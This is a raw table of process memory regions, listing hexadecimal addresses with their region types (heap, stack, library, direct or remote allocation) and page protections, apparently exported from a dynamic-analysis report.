heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

2A4C830F000

heap

page read and write

4C48000

trusted library allocation

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

25EE0000

trusted library allocation

page read and write

75A9000

heap

page read and write

1F4000

heap

page read and write

2A4C829F000

heap

page read and write

76C0000

trusted library allocation

page read and write

1F4000

heap

page read and write

1D6DBE5F000

heap

page read and write

25ED0000

trusted library allocation

page read and write

1F4000

heap

page read and write

1F5000

heap

page read and write

7FF849030000

trusted library allocation

page read and write

236C9000

stack

page read and write

A3000

trusted library allocation

page execute and read and write

1D6C5890000

trusted library allocation

page read and write

2A4C855D000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

680000

direct allocation

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1F5000

heap

page read and write

1F5000

heap

page read and write

1F4000

heap

page read and write

5AD000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1D6C56AE000

trusted library allocation

page read and write

235A0000

remote allocation

page read and write

237A0000

trusted library allocation

page read and write

2A4C829E000

heap

page read and write

25F00000

trusted library allocation

page read and write

1F5000

heap

page read and write

25F40000

trusted library allocation

page read and write

1D6DBCA0000

heap

page read and write

1F4000

heap

page read and write

1F5000

heap

page read and write

25EF0000

trusted library allocation

page read and write

1D6C3BA9000

trusted library allocation

page read and write

1D6C3FFA000

trusted library allocation

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

26820000

trusted library allocation

page read and write

1F4000

heap

page read and write

1D6D3967000

trusted library allocation

page read and write

1F4000

heap

page read and write

5BC000

heap

page read and write

2678E000

stack

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1F5000

heap

page read and write

3110000

heap

page read and write

267E0000

trusted library allocation

page read and write

4654000

remote allocation

page execute and read and write

89A0000

direct allocation

page read and write

7FF8490A0000

trusted library allocation

page read and write

5B19000

trusted library allocation

page read and write

1F4000

heap

page read and write

1F5000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

25EF0000

trusted library allocation

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

2346E000

stack

page read and write

1F5000

heap

page read and write

1F4000

heap

page read and write

1D6C1B73000

heap

page read and write

76B0000

trusted library allocation

page read and write

1F4000

heap

page read and write

1D6C1BAF000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

7FF849060000

trusted library allocation

page read and write

25F20000

trusted library allocation

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

75B9000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

25ED0000

trusted library allocation

page read and write

1F4000

heap

page read and write

7FF848ED0000

trusted library allocation

page read and write

1F5000

heap

page read and write

1F5000

heap

page read and write

25F30000

trusted library allocation

page read and write

1F5000

heap

page read and write

1D6C3BAD000

trusted library allocation

page read and write

1D6C55F6000

trusted library allocation

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

7FF848E20000

trusted library allocation

page read and write

90000

trusted library allocation

page read and write

1F4000

heap

page read and write

1F5000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

78D0000

trusted library allocation

page read and write

7FF848FC0000

trusted library allocation

page read and write

1F4000

heap

page read and write

1D6C1B2E000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

7FF848E3B000

trusted library allocation

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

7FF849150000

trusted library allocation

page read and write

1D6C563B000

trusted library allocation

page read and write

25AF0000

trusted library allocation

page read and write

1F4000

heap

page read and write

238D6000

trusted library allocation

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1F5000

heap

page read and write

1F5000

heap

page read and write

1F4000

heap

page read and write

D5000

trusted library allocation

page execute and read and write

1F4000

heap

page read and write

25EF0000

trusted library allocation

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1F5000

heap

page read and write

5C6000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

2A4CA1E2000

heap

page read and write

717000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

25EE0000

trusted library allocation

page read and write

7FF848E7C000

trusted library allocation

page execute and read and write

1F4000

heap

page read and write

25F30000

trusted library allocation

page read and write

1F4000

heap

page read and write

1F5000

heap

page read and write

1F5000

heap

page read and write

1F4000

heap

page read and write

2F05000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

25EF0000

trusted library allocation

page read and write

7FF8491A0000

trusted library allocation

page read and write

1F4000

heap

page read and write

840E000

stack

page read and write

260B0000

trusted library allocation

page execute and read and write

25F10000

trusted library allocation

page read and write

25EDD000

trusted library allocation

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1F5000

heap

page read and write

1D6C588C000

trusted library allocation

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1D6C528B000

trusted library allocation

page read and write

1F4000

heap

page read and write

85BC000

stack

page read and write

1F5000

heap

page read and write

500000

heap

page read and write

1F4000

heap

page read and write

B0000

trusted library allocation

page read and write

1F5000

heap

page read and write

7F5C0000

trusted library allocation

page execute and read and write

2A4C8317000

heap

page read and write

25BE6000

heap

page read and write

25ED0000

trusted library allocation

page read and write

2353E000

stack

page read and write

D7000

trusted library allocation

page execute and read and write

7FF849050000

trusted library allocation

page read and write

30CA000

trusted library allocation

page execute and read and write

1F4000

heap

page read and write

25F40000

trusted library allocation

page read and write

1F4000

heap

page read and write

25AA0000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1F5000

heap

page read and write

2E19000

heap

page read and write

1D6C36F5000

trusted library allocation

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

25EF0000

trusted library allocation

page read and write

1F4000

heap

page read and write

1D6C1BAD000

heap

page read and write

1F4000

heap

page read and write

BA94000

direct allocation

page execute and read and write

1F5000

heap

page read and write

267E0000

trusted library allocation

page read and write

1F4000

heap

page read and write

1F5000

heap

page read and write

1F4000

heap

page read and write

3070000

trusted library section

page read and write

1F4000

heap

page read and write

1D6DBB7F000

heap

page read and write

1D6C3590000

trusted library allocation

page read and write

88EE000

stack

page read and write

56A000

heap

page read and write

1E886150000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

55C000

heap

page read and write

25EF2000

trusted library allocation

page read and write

1D6C40B1000

trusted library allocation

page read and write

1F4000

heap

page read and write

714D000

stack

page read and write

1F5000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

25B99000

heap

page read and write

508000

heap

page read and write

1F4000

heap

page read and write

1D6C56A9000

trusted library allocation

page read and write

1F4000

heap

page read and write

267E0000

trusted library allocation

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

25EE0000

trusted library allocation

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1D6DBCA4000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1F5000

heap

page read and write

1F4000

heap

page read and write

235A0000

remote allocation

page read and write

1F4000

heap

page read and write

98144FF000

stack

page read and write

1F5000

heap

page read and write

2A4C82CF000

heap

page read and write

1F4000

heap

page read and write

2A4C8270000

heap

page read and write

1F5000

heap

page read and write

2602E000

stack

page read and write

8350000

trusted library allocation

page read and write

1F4000

heap

page read and write

1F5000

heap

page read and write

4AE0000

heap

page execute and read and write

25F30000

trusted library allocation

page read and write

1F4000

heap

page read and write

2E9E000

stack

page read and write

1F4000

heap

page read and write

1F5000

heap

page read and write

1F5000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

2E5E000

stack

page read and write

1F4000

heap

page read and write

1F5000

heap

page read and write

1F4000

heap

page read and write

1F5000

heap

page read and write

25EE0000

trusted library allocation

page read and write

7040BF000

stack

page read and write

1F4000

heap

page read and write

1D6D3977000

trusted library allocation

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

26830000

trusted library allocation

page read and write

25F50000

trusted library allocation

page execute and read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1F5000

heap

page read and write

576000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

7940000

trusted library allocation

page read and write

7877000

trusted library allocation

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

7FF849160000

trusted library allocation

page read and write

1F5000

heap

page read and write

26840000

trusted library allocation

page read and write

71CE000

stack

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

25EF0000

trusted library allocation

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

25EE0000

trusted library allocation

page read and write

704E4B000

stack

page read and write

1F4000

heap

page read and write

7020000

direct allocation

page read and write

1F4000

heap

page read and write

1F5000

heap

page read and write

5C7C000

trusted library allocation

page read and write

7FF848EE0000

trusted library allocation

page execute and read and write

2395D000

trusted library allocation

page read and write

1F4000

heap

page read and write

25EE0000

trusted library allocation

page read and write

25F60000

trusted library allocation

page read and write

1F5000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

25F30000

trusted library allocation

page read and write

25F00000

trusted library allocation

page read and write

1F4000

heap

page read and write

30A0000

trusted library allocation

page read and write

1F4000

heap

page read and write

25F20000

trusted library allocation

page read and write

26750000

trusted library allocation

page read and write

1F4000

heap

page read and write

1F5000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

235DE000

stack

page read and write

1D6C587E000

trusted library allocation

page read and write

2A4C82D2000

heap

page read and write

2A4C82C9000

heap

page read and write

786D000

stack

page read and write

2C7C000

stack

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

2A4C8301000

heap

page read and write

1F4000

heap

page read and write

3118000

heap

page read and write

1F4000

heap

page read and write

1DF000

stack

page read and write

1F4000

heap

page read and write

25EF0000

trusted library allocation

page read and write

1D6DBE23000

heap

page read and write

1F5000

heap

page read and write

1D6C1B20000

heap

page read and write

30C0000

trusted library allocation

page read and write

25EF0000

trusted library allocation

page read and write

1D6DBC80000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

23B35000

trusted library allocation

page read and write

1F5000

heap

page read and write

1F5000

heap

page read and write

25EE0000

trusted library allocation

page read and write

700000

direct allocation

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

75A0000

heap

page read and write

1F4000

heap

page read and write

25EE0000

trusted library allocation

page read and write

25B20000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

26830000

trusted library allocation

page read and write

1F5000

heap

page read and write

7FF849190000

trusted library allocation

page read and write

1F5000

heap

page read and write

7042FB000

stack

page read and write

7FF8490F0000

trusted library allocation

page read and write

1F4000

heap

page read and write

25F40000

trusted library allocation

page read and write

1F4000

heap

page read and write

1D6C1D70000

trusted library allocation

page read and write

1F4000

heap

page read and write

2A4C82EC000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

7FF849180000

trusted library allocation

page read and write

1F4000

heap

page read and write

6E54000

remote allocation

page execute and read and write

1F4000

heap

page read and write

1F5000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

86C5000

heap

page read and write

25F00000

trusted library allocation

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

8480000

trusted library allocation

page read and write

1F5000

heap

page read and write

2A4C82F6000

heap

page read and write

1F4000

heap

page read and write

78F0000

trusted library allocation

page read and write

1D6C3560000

trusted library allocation

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

25EF0000

trusted library allocation

page read and write

1F4000

heap

page read and write

25EE0000

trusted library allocation

page read and write

1D6C1DB0000

heap

page read and write

1F4000

heap

page read and write

78A0000

trusted library allocation

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

8430000

trusted library allocation

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1F5000

heap

page read and write

1F4000

heap

page read and write

25E0D000

stack

page read and write

7FF848FDA000

trusted library allocation

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

2A4C834F000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

25EF0000

trusted library allocation

page read and write

1F5000

heap

page read and write

1F5000

heap

page read and write

25AC0000

heap

page execute and read and write

25EF0000

trusted library allocation

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

597000

heap

page read and write

1F4000

heap

page read and write

1D6C1BF7000

heap

page read and write

25EF0000

trusted library allocation

page read and write

1F4000

heap

page read and write

23B40000

trusted library allocation

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

25F40000

trusted library allocation

page read and write

1F4000

heap

page read and write

25EF0000

trusted library allocation

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

5AF000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1F5000

heap

page read and write

1F4000

heap

page read and write

704DCB000

stack

page read and write

1F5000

heap

page read and write

1D6C3BBE000

trusted library allocation

page read and write

25EF0000

trusted library allocation

page read and write

2340F000

stack

page read and write

7010000

direct allocation

page read and write

238C2000

trusted library allocation

page read and write

1F4000

heap

page read and write

C2000

trusted library allocation

page read and write

1F4000

heap

page read and write

744E000

stack

page read and write

25ED0000

trusted library allocation

page read and write

8880000

trusted library allocation

page read and write

1F4000

heap

page read and write

24939000

trusted library allocation

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1D6C5866000

trusted library allocation

page read and write

1F4000

heap

page read and write

1F5000

heap

page read and write

25EF0000

trusted library allocation

page read and write

1D6C3671000

trusted library allocation

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

892E000

stack

page read and write

1D6C41A7000

trusted library allocation

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

2338C000

stack

page read and write

1F4000

heap

page read and write

25EF0000

trusted library allocation

page read and write

3090000

trusted library allocation

page read and write

1F5000

heap

page read and write

25EF0000

trusted library allocation

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

25EF0000

trusted library allocation

page read and write

1F4000

heap

page read and write

1F5000

heap

page read and write

25EF1000

trusted library allocation

page read and write

1F4000

heap

page read and write

19E000

stack

page read and write

1F4000

heap

page read and write

25EE0000

trusted library allocation

page read and write

1F4000

heap

page read and write

25EF0000

trusted library allocation

page read and write

1F5000

heap

page read and write

1F4000

heap

page read and write

7FF848E22000

trusted library allocation

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1F5000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1F5000

heap

page read and write

540000

heap

page read and write

2606E000

stack

page read and write

1F4000

heap

page read and write

1D6C3B90000

trusted library allocation

page read and write

1F5000

heap

page read and write

1F5000

heap

page read and write

1F5000

heap

page read and write

2A4C8299000

heap

page read and write

1F4000

heap

page read and write

25EE0000

trusted library allocation

page read and write

1F4000

heap

page read and write

76B7000

trusted library allocation

page read and write

2A4C830F000

heap

page read and write

1F4000

heap

page read and write

7FF849120000

trusted library allocation

page read and write

1D6C1CF0000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

25EF0000

trusted library allocation

page read and write

1F4000

heap

page read and write

238BB000

trusted library allocation

page read and write

1F4000

heap

page read and write

4A6E000

stack

page read and write

2A4C82CA000

heap

page read and write

7030000

direct allocation

page read and write

1F4000

heap

page read and write

703EF7000

stack

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1E886250000

heap

page read and write

1F5000

heap

page read and write

25F40000

trusted library allocation

page read and write

78B0000

trusted library allocation

page read and write

2A4C8345000

heap

page read and write

7FF848E23000

trusted library allocation

page execute and read and write

1F4000

heap

page read and write

7DF4F7FA0000

trusted library allocation

page execute and read and write

2394E000

trusted library allocation

page read and write

1F4000

heap

page read and write

1F5000

heap

page read and write

7FF849110000

trusted library allocation

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

23750000

heap

page read and write

7220000

heap

page read and write

2A4C8250000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

2A4C82DA000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

25EDD000

trusted library allocation

page read and write

26850000

trusted library allocation

page read and write

25F10000

trusted library allocation

page read and write

23B4C000

trusted library allocation

page read and write

1F4000

heap

page read and write

25921000

heap

page read and write

78C0000

trusted library allocation

page read and write

300E000

stack

page read and write

1F4000

heap

page read and write

25E8E000

stack

page read and write

1F4000

heap

page read and write

25EF0000

trusted library allocation

page read and write

25EE0000

trusted library allocation

page read and write

6FBD000

stack

page read and write

1F4000

heap

page read and write

25F30000

trusted library allocation

page read and write

304E000

stack

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

235A0000

remote allocation

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

25F40000

trusted library allocation

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

25F00000

trusted library allocation

page read and write

25EE0000

trusted library allocation

page read and write

7F490000

trusted library allocation

page execute and read and write

25F10000

trusted library allocation

page read and write

863E000

stack

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

7FF848FF0000

trusted library allocation

page execute and read and write

2374F000

stack

page read and write

25F40000

trusted library allocation

page read and write

1F4000

heap

page read and write

7FF8491B0000

trusted library allocation

page read and write

70427E000

stack

page read and write

1D6DBD9C000

heap

page read and write

26840000

trusted library allocation

page read and write

1F4000

heap

page read and write

1F5000

heap

page read and write

1F5000

heap

page read and write

BAE43FE000

stack

page read and write

A4000

trusted library allocation

page read and write

1F4000

heap

page read and write

AD000

trusted library allocation

page execute and read and write

8990000

direct allocation

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

3070000

heap

page read and write

1F4000

heap

page read and write

1F5000

heap

page read and write

1F4000

heap

page read and write

CE94000

direct allocation

page execute and read and write

2A4C82CF000

heap

page read and write

1D6C1B69000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1F5000

heap

page read and write

25F00000

trusted library allocation

page read and write

25ED0000

trusted library allocation

page read and write

1F5000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1F5000

heap

page read and write

1F4000

heap

page read and write

98143FF000

unkown

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

267E0000

trusted library allocation

page read and write

30D0000

trusted library allocation

page read and write

2330E000

stack

page read and write

1F4000

heap

page read and write

1D6C52A1000

trusted library allocation

page read and write

2A4CA1EE000

heap

page read and write

6F2F000

stack

page read and write

1F4000

heap

page read and write

25F00000

trusted library allocation

page read and write

1F5000

heap

page read and write

1F4000

heap

page read and write

86A3000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

25EF0000

trusted library allocation

page read and write

1F4000

heap

page read and write

1D6C4155000

trusted library allocation

page read and write

25ED3000

trusted library allocation

page read and write

A0000

trusted library allocation

page read and write

5B56000

trusted library allocation

page read and write

1D6C1AD0000

heap

page read and write

25AA0000

trusted library allocation

page read and write

1D6C1AB0000

heap

page read and write

23B21000

trusted library allocation

page read and write

1F4000

heap

page read and write

25EE0000

trusted library allocation

page read and write

1F4000

heap

page read and write

25920000

trusted library allocation

page read and write

1F4000

heap

page read and write

1D6C418F000

trusted library allocation

page read and write

26830000

trusted library allocation

page read and write

761C000

heap

page read and write

25F00000

trusted library allocation

page read and write

1E886380000

heap

page read and write

1F4000

heap

page read and write

2A4C82CF000

heap

page read and write

1F5000

heap

page read and write

870D000

heap

page read and write

1F4000

heap

page read and write

1D6DBAC0000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1E8864A4000

heap

page read and write

1F4000

heap

page read and write

1D6DBE08000

heap

page read and write

7910000

trusted library allocation

page read and write

7FF848E30000

trusted library allocation

page read and write

26810000

trusted library allocation

page read and write

1D6C4BCD000

trusted library allocation

page read and write

1F4000

heap

page read and write

1F5000

heap

page read and write

1F4000

heap

page read and write

25EF0000

trusted library allocation

page read and write

1F4000

heap

page read and write

7060000

direct allocation

page read and write

1F5000

heap

page read and write

25F00000

trusted library allocation

page read and write

25EE0000

trusted library allocation

page read and write

1F5000

heap

page read and write

1F4000

heap

page read and write

D2000

trusted library allocation

page read and write

70417E000

stack

page read and write

1F4000

heap

page read and write

3AA0000

remote allocation

page execute and read and write

2379C000

stack

page read and write

1F5000

heap

page read and write

1F4000

heap

page read and write

238BE000

trusted library allocation

page read and write

1F4000

heap

page read and write

26860000

trusted library allocation

page read and write

6454000

remote allocation

page execute and read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

7FF849080000

trusted library allocation

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

267D5000

trusted library allocation

page read and write

2A4C82CF000

heap

page read and write

1D6DBDC2000

heap

page read and write

6D0000

direct allocation

page read and write

1F5000

heap

page read and write

1F4000

heap

page read and write

1F5000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

25ED0000

trusted library allocation

page read and write

1F4000

heap

page read and write

2B5B000

heap

page read and write

1F4000

heap

page read and write

1E8864A0000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

6FFB000

stack

page read and write

25EF0000

trusted library allocation

page read and write

4AF1000

trusted library allocation

page read and write

2370E000

stack

page read and write

25F40000

trusted library allocation

page read and write

89B0000

direct allocation

page read and write

7FF849002000

trusted library allocation

page read and write

2A4C8317000

heap

page read and write

25AD0000

trusted library allocation

page read and write

867C000

stack

page read and write

1F4000

heap

page read and write

1F5000

heap

page read and write

720000

direct allocation

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1D6C3CFF000

trusted library allocation

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

7050000

direct allocation

page read and write

267D0000

trusted library allocation

page read and write

1F5000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

8890000

trusted library allocation

page read and write

1D6DBACE000

heap

page read and write

88A0000

trusted library allocation

page read and write

25F40000

trusted library allocation

page read and write

25EF0000

trusted library allocation

page read and write

1F5000

heap

page read and write

1F4000

heap

page read and write

1D6C3660000

heap

page execute and read and write

7FF848E2D000

trusted library allocation

page execute and read and write

2D30000

heap

page read and write

26830000

trusted library allocation

page read and write

1F5000

heap

page read and write

23630000

direct allocation

page read and write

1F4000

heap

page read and write

4A0E000

stack

page read and write

2A4C829F000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

25EF0000

trusted library allocation

page read and write

1F4000

heap

page read and write

6F0000

direct allocation

page read and write

E0000

trusted library allocation

page execute and read and write

1D6DBBBB000

heap

page read and write

25EE0000

trusted library allocation

page read and write

1F4000

heap

page read and write

1F5000

heap

page read and write

1F5000

heap

page read and write

26870000

trusted library allocation

page read and write

25EF0000

trusted library allocation

page read and write

4A10000

trusted library allocation

page read and write

704078000

stack

page read and write

1F5000

heap

page read and write

70393E000

stack

page read and write

1F4000

heap

page read and write

237B0000

trusted library allocation

page read and write

1F5000

heap

page read and write

1F5000

heap

page read and write

704CCE000

stack

page read and write

1F5000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

8330000

heap

page read and write

1F4000

heap

page read and write

7FF8490C0000

trusted library allocation

page read and write

2A4C82F7000

heap

page read and write

2A4C8555000

heap

page read and write

BD000

trusted library allocation

page execute and read and write

1F4000

heap

page read and write

26820000

trusted library allocation

page read and write

7FF849010000

trusted library allocation

page execute and read and write

1F4000

heap

page read and write

4E0000

heap

page readonly

2A4C8327000

heap

page read and write

2E10000

heap

page read and write

1F4000

heap

page read and write

23B12000

trusted library allocation

page read and write

78E0000

trusted library allocation

page read and write

6E6E000

stack

page read and write

1F4000

heap

page read and write

30D5000

trusted library allocation

page execute and read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

2A4C8317000

heap

page read and write

1D6C1C00000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1D6DC120000

heap

page read and write

25EE0000

trusted library allocation

page read and write

1F4000

heap

page read and write

1F5000

heap

page read and write

25EF0000

trusted library allocation

page read and write

25A5C000

stack

page read and write

1F5000

heap

page read and write

1F4000

heap

page read and write

25EE0000

trusted library allocation

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

2A4C8550000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1F5000

heap

page read and write

3130000

heap

page read and write

8475000

trusted library allocation

page read and write

1D6C1BF3000

heap

page read and write

7210000

heap

page read and write

25F40000

trusted library allocation

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1D6C1AA0000

heap

page read and write

1F5000

heap

page read and write

1F5000

heap

page read and write

1F4000

heap

page read and write

B094000

direct allocation

page execute and read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1F5000

heap

page read and write

1F4000

heap

page read and write

1F5000

heap

page read and write

573000

heap

page read and write

2A4C8301000

heap

page read and write

2A4C82C1000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1F5000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

3120000

trusted library allocation

page execute and read and write

6EEE000

stack

page read and write

1F4000

heap

page read and write

2A4C8278000

heap

page read and write

1F4000

heap

page read and write

703FFC000

stack

page read and write

1F4000

heap

page read and write

7FF848ED6000

trusted library allocation

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

25F00000

trusted library allocation

page read and write

1F4000

heap

page read and write

25F20000

trusted library allocation

page read and write

1F4000

heap

page read and write

7FF848F06000

trusted library allocation

page execute and read and write

6B0000

direct allocation

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1F5000

heap

page read and write

8940000

trusted library allocation

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

2A4C835E000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1F5000

heap

page read and write

1F4000

heap

page read and write

30A4000

trusted library allocation

page read and write

5AF1000

trusted library allocation

page read and write

BAE41FE000

stack

page read and write

1F4000

heap

page read and write

25B99000

heap

page read and write

70D000

stack

page read and write

2A4C8317000

heap

page read and write

1F4000

heap

page read and write

7038B3000

stack

page read and write

4F0000

direct allocation

page read and write

23420000

trusted library allocation

page read and write

3100000

heap

page readonly

2A4C82E5000

heap

page read and write

24911000

trusted library allocation

page read and write

6E0000

direct allocation

page read and write

2A4C8300000

heap

page read and write

1F4000

heap

page read and write

2361F000

stack

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

25EE0000

trusted library allocation

page read and write

2A4C82C9000

heap

page read and write

1F5000

heap

page read and write

1D6C1B6F000

heap

page read and write

26820000

trusted library allocation

page execute and read and write

26830000

trusted library allocation

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1F5000

heap

page read and write

25BCE000

heap

page read and write

1F4000

heap

page read and write

25921000

heap

page read and write

8340000

trusted library allocation

page execute and read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1D6D3671000

trusted library allocation

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

4960000

heap

page read and write

1F4000

heap

page read and write

2F53000

heap

page read and write

1F4000

heap

page read and write

238DD000

trusted library allocation

page read and write

8680000

heap

page read and write

25EF0000

trusted library allocation

page read and write

1F5000

heap

page read and write

1F4000

heap

page read and write

1F5000

heap

page read and write

1D6C1B67000

heap

page read and write

267E0000

trusted library allocation

page read and write

1D6C1D30000

trusted library allocation

page read and write

1D6C5880000

trusted library allocation

page read and write

703DFE000

stack

page read and write

BAE3DFE000

stack

page read and write

1F4000

heap

page read and write

25F40000

trusted library allocation

page read and write

25F40000

trusted library allocation

page read and write

1F4000

heap

page read and write

6EAF000

stack

page read and write

1F5000

heap

page read and write

1F4000

heap

page read and write

2F12000

heap

page read and write

1F5000

heap

page read and write

1F5000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

25EE0000

trusted library allocation

page read and write

7070000

direct allocation

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

7900000

trusted library allocation

page read and write

1F4000

heap

page read and write

2A4C9E90000

heap

page read and write

1F4000

heap

page read and write

